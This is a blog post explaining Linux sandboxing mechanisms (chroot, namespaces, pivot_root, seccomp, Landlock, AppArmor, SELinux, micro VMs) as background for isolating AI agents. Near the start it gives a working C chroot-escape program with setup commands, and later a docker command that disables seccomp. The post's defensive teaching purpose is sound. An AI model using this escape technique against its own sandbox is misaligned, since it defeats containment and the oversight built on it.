Securing agents
Introduction
Well this post really isn’t about securing agents, atleast not a practical guide. I wanted to use this opportunity to learn and write about the various techniques and mechanisms that have evolved over the years to isolate and sandbox code in a co-hosted environment, like a time-sharing operating system say, Linux or a UNIX (actually this post is pretty Linux specific, but you get the gist). I have not used any of the BSDs so while I do know that BSD has the jails mechanism to isolate running code, I haven’t had any practical experience work with it, so sadly this post will exclude mentioning it.
Okay, enough foreplay, now lets dive right in !
Chroot: The beginning
I wouldn’t call chroot a security mechanism really. While it does change the / (root) directory of the calling process to the path specified as an argument (so chroot /tmp/jail makes /tmp/jail the root directory of the calling process), it is trivial to breakout of chroot, especially if the program you are executing has root permissions (setuid binary) or the user that is running a program under a chroot has sufficient privileges. More specifically, a root user inside a chroot can open a file descriptor to a folder inside the chroot (say /tmp/a), chroot to another folder (/tmp/b/c/), then chdir back to /tmp/a and use chdir("..") to escape the chroot “jail”
The man page in fact explicitly mentions that chroot is not meant to be a process isolation or a filesystem restriction mechanism.
I had Claude craft a simple demonstration program for me and verified that it was possible to escape out of chroot jail. We write a program escape that is executed inside a chroot jail and the program does the trick mentioned above to escape it. We can verify that it indeed does by checking if we have access to the file /etc/hostname and passwd on our host (which wouldn’t be possible if chroot truly could lockdown our program’s access)
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <errno.h>
int main() {
printf("[*] Attempting chroot escape...\n");
// Step 1: Create a temporary directory
if (mkdir("tmpdir", 0755) != 0 && errno != EEXIST) {
printf("[-] mkdir failed: %s\n", strerror(errno));
return 1;
}
// Step 2: Save fd to current root
int dir_fd = open(".", O_RDONLY);
if (dir_fd < 0) {
printf("[-] open failed: %s\n", strerror(errno));
return 1;
}
// Step 3: Chroot into subdirectory
if (chroot("tmpdir") != 0) {
printf("[-] chroot failed: %s\n", strerror(errno));
close(dir_fd);
return 1;
}
// Step 4: Escape back via saved fd
if (fchdir(dir_fd) != 0) {
printf("[-] fchdir failed: %s\n", strerror(errno));
close(dir_fd);
return 1;
}
close(dir_fd);
// Step 5: Walk up to real root
for (int i = 0; i < 100; i++) {
chdir("..");
}
// Step 6: Set real root
if (chroot(".") != 0) {
printf("[-] final chroot failed: %s\n", strerror(errno));
return 1;
}
// Step 7: Try to read /etc/hostname as proof of escape
printf("[*] Trying to read /etc/hostname...\n");
FILE *f = fopen("/etc/hostname", "r");
if (f) {
char buf[256];
if (fgets(buf, sizeof(buf), f))
printf("[+] ESCAPED! /etc/hostname: %s", buf);
fclose(f);
} else {
printf("[-] Escape failed: %s\n", strerror(errno));
}
// Step 8: Try listing /etc as further proof
printf("[*] Trying to list /etc...\n");
if (access("/etc/passwd", F_OK) == 0) {
printf("[+] ESCAPED! /etc/passwd is accessible\n");
} else {
printf("[-] /etc/passwd not accessible: %s\n", strerror(errno));
}
return 0;
}
gcc -o escape escape.c
sudo mkdir -p /tmp/jail/bin /tmp/jail/lib
sudo cp /bin/sh /bin/ls /tmp/jail/bin/
sudo cp escape /tmp/jail/
# Copy required shared libs
sudo ldd /bin/sh | grep -o '/lib[^ ]*' | while read lib; do
sudo cp --parents "$lib" /tmp/jail/
done
sudo chroot /tmp/jail /bin/sh
# Now inside the jail:
# ./escape
Namespaces, Capabilities and pivot_root
Well obviously chroot isn’t sufficient because a root user run program (or a setuid binary) can break out of it. It was built more as a mechanism to created isolated builds of programs without having to destroy or corrupt the filesystem while installing or updating packages but clearly people needed someway to be able to run code in an isolated fashion, so enter namespaces, capabilities and pivot_root
I assume you know what namespaces, capabilities and mounts in a Linux system are but if you don’t or your memory of them isn’t sharp, scroll down below to the Appendix section to refresh your memory
The pivot_root system call/shell command pivots or “swaps” the current root directory of the calling process to the directory provides as the first argument and stores a reference to the old root at the directory provided as the second argument. Once the roots have been swapped, we can unmount the old root so that our isolated program can no longer escape the current root.
Changing the root of a system is a hazardous operation, so these steps are carried out in a new mount namespace that is private so that the changes made in that mount namespace don’t affect the rest of the system. Container runtimes (such as runc or containerd), used by Kubernetes, Docker etc setup a mount namespace for containers before running them to create this illusion of isolated systems.
mkdir -p /tmp/pivot_root_jail/bin /tmp/jail/lib
mkdir -p /tmp/pivot_root_jail/.old_root
cp /bin/sh /bin/ls /tmp/pivot_root_jail/bin/
cp escape /tmp/pivot_root_jail
# Copy required shared libs
ldd /bin/sh | grep -o '/lib[^ ]*' | while read lib; do
cp --parents "$lib" /tmp/pivot_root_jail/
done
# Copy umount and its required libraries into our new root
cp /usr/bin/umount /tmp/pivot_root_jail/bin/
ldd /usr/bin/umount | grep -o '/lib[^ ]*' | while read lib; do
cp --parents "$lib" /tmp/pivot_root_jail/
done
unshare --mount --fork bash -c '
mount --bind /tmp/pivot_root_jail /tmp/pivot_root_jail
cd /tmp/pivot_root_jail
pivot_root . .old_root
umount -l .old_root
./escape
'
Running the same escape program above with a new mount namespace and only a subset of the host’s directory tree mounted into a new namespace we can see that even as root our program cannot access the hostname or passwd files, thus “jailing” our program.
[*] Attempting chroot escape...
[*] Trying to read /etc/hostname...
[-] Escape failed: No such file or directory
[*] Trying to list /etc...
[-] /etc/passwd not accessible: No such file or directory
mount namespaces are a starting point. The next issue that crops up is that our user inside the namespace is still a root user with access to kernel apis for manipulating networking or accessing shared IPC primitives or loading drivers filesystems etc. We can create a user namespace when calling unshare that makes our bash process within the isolation a root but mapped to a non-privileged user outside of it.
This way a user gets all permissions within the isolation but cannot manipulate anything outside of it.
This seems to be the approach used by rootless container runtimes such as podman
Seccomp
Namesapce Isolation is fine, but sometimes it isn’t sufficient. To isolate a target process using a combination of namespaces and mount points we need to possibly anticipate every operation an arbitrary target process can do and that might not be possible. Linux therefor provides the seccomp facility which allows preventing or filtering out system calls made by a target process.
seccomp works by setting filters that allow a specified set of system calls to be made by the target process and its children, with defaults that either return an error when system calls not on the list are called or by sending a SIGKILL to the target process, or logging the call when a system call not in the list is called. seccomp lists can also specify arguments for the system call such that the system call is rejected only when called with a certain argument (such as fd = 1 for example) but this is a bit diffcult to be used reliably as paths, file descriptors etc can change on every run.
The filters are written in the the BPF or (extended BPF aka eBPF nowadays) language and set via the pr_ctl or seccomp system calls.
It is not feasible to expect every developer to be able to write these filters reliably so tools like Docker and Kubernetes and Flatpak allow setting seccomp filtering via a seccomp profile which is a JSON format file specifying the list of allowed syscalls and the policy for what should be done when other syscalls being executed by the program.
Here is an example seccomp program that install a seccomp filter to block the clock_gettime system call.
Note that clock_gettime call in many distros use vDSO, a Linux feature to accelerate common system calls so that these system calls bypass jumping to the Kernel context and run faster. For our example, we bypass calling clock_gettime and use the syscall system call to ensure that clock_gettime is called via the sys call interface and doesn’t use vDSO.
One more important step before setting up a seccomp filter is to prevent the Program from acquiring newer privileges (or capabilities). By calling prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) we make sure that our process and its children cannot gain newer privleges by executing a setuid binary and gaining additional capabilities. This would bypass the seccomp filters we just setup, therefore we lock down the ability of our process to gain new privileges before setting up the seccomp filters using PR_SET_NO_NEW_PRIVS.
#include <stdio.h>
#include <stdlib.h>
#include <stddef.h>
#include <unistd.h>
#include <linux/seccomp.h>
#include <linux/filter.h>
#include <linux/audit.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <time.h>
#include <errno.h>
#include <string.h>
// Architecture check varies by platform
#if defined(__x86_64__)
#define ARCH_NR AUDIT_ARCH_X86_64
#elif defined(__aarch64__)
#define ARCH_NR AUDIT_ARCH_AARCH64
#else
#error "Unsupported architecture"
#endif
void install_filter() {
struct sock_filter filter[] = {
// Load the syscall architecture
BPF_STMT(BPF_LD | BPF_W | BPF_ABS,
offsetof(struct seccomp_data, arch)),
// Verify it's our architecture
BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, ARCH_NR, 1, 0),
BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),
// Load the syscall number
BPF_STMT(BPF_LD | BPF_W | BPF_ABS,
offsetof(struct seccomp_data, nr)),
// Block clock_gettime
BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, SYS_clock_gettime, 0, 1),
BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | (EPERM & SECCOMP_RET_DATA)),
// Allow everything else
BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
};
struct sock_fprog prog = {
.len = (unsigned short)(sizeof(filter) / sizeof(filter[0])),
.filter = filter,
};
if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0) {
perror("prctl(NO_NEW_PRIVS)");
exit(1);
}
if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) != 0) {
perror("prctl(SECCOMP)");
exit(1);
}
}
int main() {
printf("[*] Before seccomp filter:\n");
struct timespec ts;
if (clock_gettime(CLOCK_REALTIME, &ts) == 0) {
printf("[+] clock_gettime works: %ld seconds\n", ts.tv_sec);
}
printf("[*] Installing seccomp filter...\n");
install_filter();
printf("[*] After seccomp filter:\n");
if (clock_gettime(CLOCK_REALTIME, &ts) == 0) {
printf("[+] clock_gettime works: %ld seconds\n", ts.tv_sec);
} else {
printf("[-] clock_gettime BLOCKED: %s\n", strerror(errno));
}
// Prove other syscalls still work
printf("[+] printf still works (write syscall allowed)\n");
printf("[+] getpid = %d (allowed)\n", getpid());
return 0;
}
I ran this both as root and non-root users to verify that the call to clock_gettime is blocked after the filter is installed
root@6d568538fe36:/# gcc seccomp_filter.c -o secf
root@6d568538fe36:/# ./secf
[*] Before seccomp filter:
[*] Installing seccomp filter...
[*] After seccomp filter:
[-] clock_gettime BLOCKED: Operation not permitted
[+] printf still works (write syscall allowed)
[+] getpid = 1529 (allowed)
root@6d568538fe36:/# useradd -m testuser
cp secf /home/testuser/
su testuser -c '/home/testuser/secf'
[*] Before seccomp filter:
[*] Installing seccomp filter...
[*] After seccomp filter:
[-] clock_gettime BLOCKED: Operation not permitted
[+] printf still works (write syscall allowed)
[+] getpid = 1541 (allowed)
For more information on Capabilities and privileges, the man page on prctl is well worth a read.
The bubblewrap utility provides a C library and a binary for wrapping seccomp and namespace setup in a user-friendly way. You can see bubblewrap being used by OpenAI’s codex cli to execute code in isolation so that it doesn’t end up executing arbitrary code and nuking your system.
Landlock
seccomp allows filtering of system calls, but the greatest limitation seems to be that it is (not possible) or very difficult to filter system calls based on the values passed to them. For example, what if we want to block the open system call to a particular path (/etc/passwrd) ? The argument is passed as a pointer (const char*) and since the filters run in the kernel they cannot read pointers to userspace memory without copying them into kernel space first, which needs to be done via kernel functions, and isn’t really feasible via the filters.
Enter landlock. landlock is an unprivileged sandboxing API that allows even unprivileged users/processes to voluntarily give up certain privileges to enhance security. Fo example, a process can setup a landlock ruleset can allow read/write access to only /tmp folder and nothing else
struct landlock_path_beneath_attr path = {
.allowed_access = LANDLOCK_ACCESS_FS_READ_FILE,
.parent_fd = open("/tmp", O_PATH),
};
landlock_add_rule(ruleset_fd, LANDLOCK_RULE_PATH_BENEATH, &path, 0);
You can see codex using landlock, if configured for example, to setup read-only access to / when executing code.
During my research, I wondered why landlock APIs didn’t seem to be included within the bubblewrap tool and someone else had the same idea as well. The maintainers of bubblewrap however seem to consider landlock to be orthogonal to the purpose of bubblewrap and ideally would like to assume that the setup of the filesystem and user namespaces via bwrap sufficient to enforce security and for tools to wrap landlock themselves if needed.
AppArmor and SELinux
The landlock api described above is an opt-in API, that is applications have to voluntarily give up privileges. What if we are setting up a shared server and as an admin you want to enforce policies on any arbitrary binary that may or maynot use security APIs ? Enter AppArmor and SELinux.
Both of them (and capabilities etc) are part of the stackable Linux Security Modules, that allow various security enforcement mechanisms to be stacked on top of another. The fundamental difference between AppArmor and SELinux seem to be that (as summarized on the AppArmor) website is that AppArmor is Application focused, where sysadmins write and enforce policies on what specific applications can do, whereas SELinux setups policies and labels per resource (files, socks, process etc) and use rules that define how these policies can interact with one another to enforce security.
For example, as shows on the AppArmor website, an AppArmor policy for the ping executable gives (or denies) certain capabilities to the ping executable. In the following example, we deny the ability for the ping utility to open RAW sockets which defeats the purpose of ping, but demonstrates the capabilities of AppArmor:
/usr/bin/ping flags=(complain) {
deny capability net_raw,
}
Whereas SELinux setups lables on resources and policies can specify which resources with what labels can access which resources and for what system calls in particular
A context looks like this:
user:role:type:level
bash# Check a file's context
ls -Z /var/www/html/index.html
# system_u:object_r:httpd_sys_content_t:s0 /var/www/html/index.html
# Check a process's context
ps -eZ | grep httpd
# system_u:system_r:httpd_t:s0 1234 ? 00:00:01 httpd
The type field is what matters most. Here httpd runs as httpd_t and the web files are labeled httpd_sys_content_t.
A policy rule then says:
# Allow httpd_t to read files labeled httpd_sys_content_t
allow httpd_t httpd_sys_content_t:file { read open getattr };
#Everything not explicitly allowed is denied. So if httpd tries to read /etc/shadow:
bashls -Z /etc/shadow
# system_u:object_r:shadow_t:s0 /etc/shadow
But are these mechanisms enough ?
The timing of my article was fortuitous, for as I was trying to understand the need for Namespaces, Landlock, SELinux etc., the Copyfail kernel exploit grabbed headlines with its ability to break out of container isolation to gain access to the host (or atleast to other containers running in the same host thus breaking container to container isolation)
There is a fantastic writeup on how this exploit works, but to summarize, it exploits the kernel’s cryptography API, which is by default available to non-privileged users, to inject shellcode into the su binary (which can also be invoked by non-privileged users) and execute the exploited su binary to gain root access within the container and if a user namespace is not set for the container, break out of containment with atleast potential access to other containers and possibly the host system as well.
This brings us to 2 points:
- Containers and namespace still share the same kernel as the host. The implication here is that there are potentially still pathways in the kernel code that could be exploited to access resources in the host since the same kernel context is shared across multiple containers
- Namespace isolation might never be enough. We need additional controls, possibly at the hardware/register level to be able to truly isolate processes
Micro VMs
Enter Virtualization. Virtualization isn’t new, infact, If my memory servers me right, hardware virtualization predates linux namespaces and privileges. Commercial CPUs from AMD, Intel (and ARM) have since a long time supported Virtualization: Running guest operating systems within a host operating system. The hardware provides capabilities and primtives to isolate the memory access of a guest Operating system from that of the host (including memory encryption), modes etc to securely run a guess operating system on a host without sharing the virtual memory at all. The Linux kernel provides KVM, the Kernel Virtual Machine manager to run guest operating systems with shared and isolated access to devices (Network cards, disks, GPU drivers etc) on the host.
You can run a linux distro for example as a guest os using tools like qemu. qemu allows running guest operating os using emulation (faking say an ARM devices on an Intel PC) or virtualiztion (running a windows guest inside a linux host or running an alpine guest inside a debian host).
There is a great paper and article by David Kaplan, one of the architectes of AMD’s SEV (Secure Encrypted Virtualization) on how Virtualization is supported by AMD CPUs
As an example, here is a qemu command to run an alpine distro as a guest on your debian/ubuntu host, booting from an alpine distro image
qemu-system-x86_64 \
-enable-kvm \
-m 2048 \
-nic user,model=virtio \
-drive file=alpine.qcow2,media=disk,if=virtio \
-cdrom alpine-standard-3.8.0-x86_64.iso \
-sdl
Firecracker
Firecracker, developed by AWS, is an alternative to qemu with a focus on being light, secure and really fast to bootup. The initial goal of Firecracker was for a platform to be able to run their AWS lambda infra where user submitted lambda functions can be cold-started and run extremely fast. Unlike qemu it doesn’t seem to be a full-on emulator and its virtualiztion supported is limited to supporting only a few device types (such as block devices, networking devices, console devices etc) thus reducing the size and making it simple, secure and fast.
Iximiuz Labs has a great course on setting up and learning Firecracker and I intend to do it over a weekend to get to know it a bit better.
Conclusion
I didn’t really expect to dive so deep into Linux and hardware internals when starting out to write this blog post. My question was simple: how can I secure my agentic ? Turns out the answer is very complicated as the definition of security is rather difficult: Secure from whom ? What are the boundaries and what are the limitations of each security mechanism? Writing this article has brought me much better understanding and appreciation of tools like Docker and Kubernetes. While most developers loathe having to use these tools, it is really important to understand why these mechanism were implemented in the first place and that they all serve an essential role. Docker might have been a quick and easy to distribute development and execution environments for code across multiple machines, but its roots seem to lie in the need for better security and isolation and the spillover benefits of those mechanisms resulted in the ability to spin up an extremely predictable environment across multiple machines with a simple docker run command !
This list mentioned above isn’t exhaustive. I am fairly certain that there are other mechanisms that I have no idea about but are important and I might encounter them in the future. I haven’t explored Security mechanisms in other systems like BSDs or Windows but that probably is a topic for another day.
Appendix
Namespaces: A mechanism to provide isolation. Items in different namespaces cannot see one another, but ones in the same namespace can. Linux allows you to create namespaces for many things
- Process namespaces - a namespace for a heirarchy or processes. You can spint a new
initprocess that is different than theinitrunning on your host Linux for example, or launch a parent + child process group that cannot see any other group but itself (for containers) - Mount namespace - a namespace to isolate the filesystem mount table - so that any changes made to the folders and files stay within that namespace and do not reflect outside of it. The
mountnamespace is the primary tool that will be used to achieve the kind of isolation thatchrootideally should have but never really provided - IPC, NET, UTS namespaces - namespaces to isolate interprocess communication, networking and hostname isolation respectively. We will not go in-depth into any of these
Capabilities: While initially there were privilged process (running as root) and unprivileged processes, capabilties break down the privileges into sub-units so that a process need not be run as root but given a subset of the privileges to carry out its functionality. The Linux man pages list all the capabilities that can be granted. For example processes with capabilitiy CAP_NET_ADMIN can manipulate network interfaces and configuration on the system but without additional permissions on Filesystem operations
Mount Points: When we talk about “mounting” in Linux, we’re referring to attaching a filesystem (or a device, or even a virtual filesystem like proc or tmpfs) to a specific directory in the directory tree. That directory is the mount point. For example when you plugin in an USB drive and it shows up at /media/usb, that’s a mount point: The Kernel has attached the device’s filesystem to that path.
Inside a mount namespace, you can set up an entirely different set of mount points than the host, like mounting a fresh tmpfs on /tmp, binding specific host directories into the namespaces’s tree, or hiding host mounts entirely.
For isolation, a mount namescape can stars as a copy of the parent’s mount table, but from that point on, any mounts or unmounts you do inside it are invisible to the outside (using the option --r-private).
This is powerful because it means you can mount a completely different root filesystem for your isolated process, layer in read-only mounts for things the process should see but not modify, and generally construct a minimal, purpose-built filesystem view, all without the process ever knowing it doesn’t have access to the real root.
This is the foundation of how container runtimes like runc set things up before calling pivot_root;they create a mount namespace, carefully construct the filesystem tree the container should see, and then pivot into it. The process inside genuinely cannot see or reach anything you didn’t explicitly mount in, which is a far cry from chroot where a determined root process could just walk its way back out.This is makes it possible to give a process its own view of the filesystem without actually copying anything
Namespacing also extends to stuff like process IDs (where you don’t want your isolated process and its children to see other running processes in the host), IPC (not have access to pipes or shared memory of other processes), networks (control and restrict how the isolated process can communicate with the rest of the host and the world)
Kubernetes: Kubernetes provides the ability to setup seccomp profiles, add or remove capabilities from Containers and/or setup SELinux/AppArmor profiles
Docker: Docker also allows customizing capabilities and setting up seccomp profile when running containers. For the pivot_root example above, I had to run a container with SYS_ADMIN capability added and seccomp=undefined to allow me to call pivot_root on a docker container in macOS since Docker works on macOS by running containers inside a LinuxVM and by default a lot of system calls are filtered on the VM.
docker run --cap-add=SYS_ADMIN --security-opt="seccomp=unconfined" -it ubuntu:24.04 bash
Be careful though as you might be allowing arbitrary code to have access to all sorts of privileged APIs on the VM used by docker thus exposing other container’s running on your machine.